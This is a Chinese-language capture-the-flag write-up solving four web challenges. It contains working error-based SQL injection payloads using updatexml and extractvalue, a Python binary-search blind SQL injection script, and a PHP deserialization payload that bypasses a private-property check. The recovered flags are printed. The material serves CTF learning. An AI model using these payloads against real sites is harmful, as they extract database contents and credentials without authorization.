[极客大挑战 2019]HardSQL
这道题利用了报错注入
updatexml(1,concat(0x7e,(SELECT(database())),0x7e),1)
updatexml(1,concat(0x7e,(select(group_concat(table_name))from(information_schema.tables)where(table_schema)like(database())),0x7e),1)
updatexml(1,concat(0x7e,(select(group_concat(column_name))from(information_schema.columns)where(table_name)like('H4rDsq1')),0x7e),1)
updatexml(1,concat(0x7e,(select(password)from(H4rDsq1)),0x7e),1)
但是最后flag只能出来一半不知道为啥,可能限制长度了
我看还有一种办法是读取右变的字母即可,拼接一下
?username=admin'or(extractvalue(1,concat(0x7e,(select(right(password,30))from(geek.H4rDsq1)))))%23&password=123
flag{9d7645c0-4bf5-49e8-924a-0
0-4bf5-49e8-924a-0e9765147fad}
flag{9d7645c0-4bf5-49e8-924a-0e9765147fad}
这样就行了
[CISCN2019 华北赛区 Day2 Web1]Hack World
是个盲注
import requests
import time
url = "http://1c14d657-d07e-40bd-bcfa-ba12d7f8bbcc.node3.buuoj.cn/index.php"
payload = {
"id" : ""
}
result = ""
for i in range(1,50):
l = 33
r =130
mid = (l+r)>>1
while(l<r):
payload["id"] = "0^" + "(ascii(substr((select(flag)from(flag)),{0},1))>{1})".format(i,mid)
html = requests.post(url,data=payload)
print(payload)
if "Hello" in html.text:
l = mid+1
else:
r = mid
mid = (l+r)>>1
if(chr(mid)==" "):
break
result = result + chr(mid)
print(result)
print("flag: " ,result)
一步跑不出来,分开跑就行
flag{57288c34-3961-
-4433-97cc-
7397895e8175}
flag{57288c34-3961-4433-97cc-7397895e8175}
[网鼎杯 2020 青龙组]AreUSerialz
看到这样的源码一看就是反序列化问题
怎么说呢还是一个传参绕过问题
知识点就是7.1+ 对属性不敏感,就是说类中的变量的属性可以是私有也可以是公有的
因为私有有不可打印字符所以is_valid()这个函数过不去
所以我们改成公有的
<?php
highlight_file(__FILE__);
class FileHandler
{
public $op = 2;
public $filename = "flag.php";
public $content;
}
$a = new FileHandler();
$b = serialize($a);
echo ($b);
payload:
O:11:“FileHandler”:3:{s:2:“op”;i:2;s:8:“filename”;s:8:“flag.php”;s:7:“content”;N;}
flag就出来了,flag 在源码中
[GXYCTF2019]BabySQli
源码有一段加密
先base32 然后在base64
select * from user where username = ‘$name’
看了wp,学到了联合注入有个技巧
在联合查询并不存在的数据时,联合查询就会构造一个虚拟的数据。